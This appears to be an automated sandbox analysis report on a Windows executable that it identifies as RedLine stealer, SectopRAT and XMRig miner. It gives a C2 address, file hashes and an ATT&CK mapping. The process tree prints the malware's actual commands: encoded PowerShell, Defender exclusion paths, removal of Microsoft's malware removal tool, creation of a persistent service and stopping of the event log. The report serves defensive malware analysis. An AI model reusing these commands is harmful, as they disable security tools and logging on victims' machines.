Overview

overview

10

Static

static

3

6f10a5ac32...57.exe

windows7-x64

10

6f10a5ac32...57.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    02-04-2024 09:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe

  • Size

    2.6MB

  • MD5

    55e393da1714013720ddf266c7906f43

  • SHA1

    91a636913604184c010c2d9e0b331a804a2c0ab4

  • SHA256

    6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957

  • SHA512

    40a61e1d461717e45eff3be6b22561ac39c2ef1af39b46f7d149fe823d14a06bb99605a78e794d6447ece43ce6b4854192e47ad993ed4a2e78479bc7e155fe8a

  • SSDEEP

    49152:VvONaX/Lpt/IvKfeF4tIDpdIA/gvCRtDKYZ8NfBcPQSqzULJgxl6Y4KB7KkP3C+Y:VGNajwvKfpyMdvCRNZZ8NJcPQSEU9Q6z

Score
10/10
redlinesectopratxmrigtgdiscoveryevasioninfostealerminerpersistenceratspywarestealertrojanupx

Malware Config

Extracted

Family

redline

Botnet

tg

C2

163.5.112.53:51523

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 2 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 3 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 8 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe
    "C:\Users\Admin\AppData\Local\Temp\6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1800
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdABpACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAcABhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGkAcwAgAGMAbwBtAHAAdQB0AGUAcgAgAGkAcwAgAG4AbwB0ACAAcwB1AHAAcABvAHIAdABlAGQALAAgAHAAbABlAGEAcwBlACAAdAByAHkAIABhAGcAYQBpAG4AIABvAG4AIABhAG4AbwB0AGgAZQByACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB5AGMAYQAjAD4A"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAagBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAcAB5ACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2372
    • C:\Users\Admin\AppData\Roaming\a.exe
      "C:\Users\Admin\AppData\Roaming\a.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:3028
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:916
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          • Drops file in Windows directory
          PID:2128
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "TDFIYZSJ"
        3⤵
        • Launches sc.exe
        PID:836
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "TDFIYZSJ" binpath= "C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe" start= "auto"
        3⤵
        • Launches sc.exe
        PID:2160
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        3⤵
        • Launches sc.exe
        PID:2848
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "TDFIYZSJ"
        3⤵
        • Launches sc.exe
        PID:796
    • C:\Users\Admin\AppData\Roaming\b.exe
      "C:\Users\Admin\AppData\Roaming\b.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2604
  • C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe
    C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:988
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:872
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Drops file in Windows directory
        PID:2064
    • C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe
      2⤵
        PID:2076
      • C:\Windows\system32\conhost.exe
        conhost.exe
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1788

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Create or Modify System Process

    2
    T1543

    Windows Service

    2
    T1543.003

    Privilege Escalation

    Create or Modify System Process

    2
    T1543

    Windows Service

    2
    T1543.003

    Defense Evasion

    Impair Defenses

    1
    T1562

    Credential Access

    Unsecured Credentials

    2
    T1552

    Credentials In Files

    2
    T1552.001

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Data from Local System

    2
    T1005

    Exfiltration

    Command and Control

    Impact

    Service Stop

    1
    T1489

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar3895.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp3FDC.tmp
      Filesize

      46KB

      MD5

      02d2c46697e3714e49f46b680b9a6b83

      SHA1

      84f98b56d49f01e9b6b76a4e21accf64fd319140

      SHA256

      522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

      SHA512

      60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp3FF2.tmp
      Filesize

      92KB

      MD5

      18e04095708297d6889a6962f81e8d8f

      SHA1

      9a25645db1da0217092c06579599b04982192124

      SHA256

      4ed16c019fe50bb4ab1c9dcedf0e52f93454b5dbaf18615d60761e7927b69fb7

      SHA512

      45ec57bddeeb8bca05babcf8da83bf9db630819b23076a1cf79f2e54b3e88e14cd7db650332554026ab5e8634061dd699f322bcba6683765063e67ac47ea1caf

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SZ2XZBGVY9N0JBVJQE9S.temp
      Filesize

      7KB

      MD5

      8f1c7273954f34f1960b2eea981609ad

      SHA1

      dde05e5d664f9da90edcc3758a9514b3e19048b9

      SHA256

      915ca4021b7c4663f5f0ae4eb7d687870c6885df3ed9a826a6b67142c73b291e

      SHA512

      a7aa6ab55c7b0751df482d3dce938b6f7c6c9c9235610427b9157afd617a3232bd1774cd8ac599f7581f19ee1d8c4a365b7944a9657ddbbb0fbf3e8d11d3e7c8

      Download Submit
    • C:\Users\Admin\AppData\Roaming\a.exe
      Filesize

      2.5MB

      MD5

      6fd62e635b39a02ba8cac6fc124c9475

      SHA1

      e13080b9cc546e44a9f1c419ba86aeb190a14b2d

      SHA256

      78b9d7e485026278b02a1961999ad99cdfa988fbf4403767db5d10d1473e9870

      SHA512

      e77432582e6abcc0fd86ed997c9c4619bd67a044d33a752e1cf3ceb8008cea27c540949183b80f9dee8a41614cff54afe79c5db294efcb72b27685fcf1010cdc

      Download Submit
    • C:\Users\Admin\AppData\Roaming\b.exe
      Filesize

      95KB

      MD5

      184ac479b3a878e9ac5535770ca34a2b

      SHA1

      1f99039911cc2cfd1a62ce348429ddd0f4435a60

      SHA256

      8e28a0090832a76cf71c417cb1bf7990b9af86be258b732117a47f624387083c

      SHA512

      e0f5185ae890b902ea5325066df23959106712e7990e120a1b9752bbd0331cac968af5ddd6092f75a1c576d4c83f4093dfbf53a2c90870d1c02b31a0e8282bb4

      Download Submit
    • memory/872-218-0x0000000001540000-0x00000000015C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/872-217-0x0000000001540000-0x00000000015C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/872-214-0x000007FEF4580000-0x000007FEF4F1D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/872-216-0x000007FEF4580000-0x000007FEF4F1D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/872-215-0x0000000001540000-0x00000000015C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/872-213-0x0000000001170000-0x0000000001178000-memory.dmp
      Filesize

      32KB

      Download
    • memory/872-212-0x0000000019F30000-0x000000001A212000-memory.dmp
      Filesize

      2.9MB

      Download
    • memory/872-220-0x000007FEF4580000-0x000007FEF4F1D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/872-219-0x0000000001540000-0x00000000015C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1544-204-0x0000000002A20000-0x0000000002AA0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1544-203-0x0000000002A20000-0x0000000002AA0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1544-200-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1544-202-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1544-206-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1544-205-0x0000000002A20000-0x0000000002AA0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1544-197-0x000000001B560000-0x000000001B842000-memory.dmp
      Filesize

      2.9MB

      Download
    • memory/1544-199-0x0000000001F30000-0x0000000001F38000-memory.dmp
      Filesize

      32KB

      Download
    • memory/1544-201-0x0000000002A20000-0x0000000002AA0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1788-238-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-240-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-249-0x0000000000780000-0x00000000007A0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1788-248-0x0000000000760000-0x0000000000780000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1788-247-0x0000000000780000-0x00000000007A0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1788-246-0x0000000000760000-0x0000000000780000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1788-244-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-242-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-241-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-229-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-236-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-239-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-237-0x00000000001B0000-0x00000000001D0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1788-235-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-233-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-234-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-232-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/1788-231-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/2076-228-0x0000000140000000-0x000000014000E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/2076-223-0x0000000140000000-0x000000014000E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/2076-224-0x0000000140000000-0x000000014000E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/2076-225-0x0000000140000000-0x000000014000E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/2076-221-0x0000000140000000-0x000000014000E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/2076-222-0x0000000140000000-0x000000014000E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/2200-24-0x0000000072B60000-0x000000007310B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2200-25-0x00000000029F0000-0x0000000002A30000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2200-35-0x0000000072B60000-0x000000007310B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2200-29-0x00000000029F0000-0x0000000002A30000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2200-31-0x00000000029F0000-0x0000000002A30000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2200-33-0x0000000072B60000-0x000000007310B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2372-27-0x0000000072B60000-0x000000007310B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2372-26-0x00000000026F0000-0x0000000002730000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2372-30-0x00000000026F0000-0x0000000002730000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2372-23-0x0000000072B60000-0x000000007310B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2372-32-0x00000000026F0000-0x0000000002730000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2372-34-0x0000000072B60000-0x000000007310B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2604-198-0x0000000072470000-0x0000000072B5E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/2604-22-0x0000000000BA0000-0x0000000000BBE000-memory.dmp
      Filesize

      120KB

      Download
    • memory/2604-243-0x0000000072470000-0x0000000072B5E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/2604-28-0x0000000072470000-0x0000000072B5E000-memory.dmp
      Filesize

      6.9MB

      Download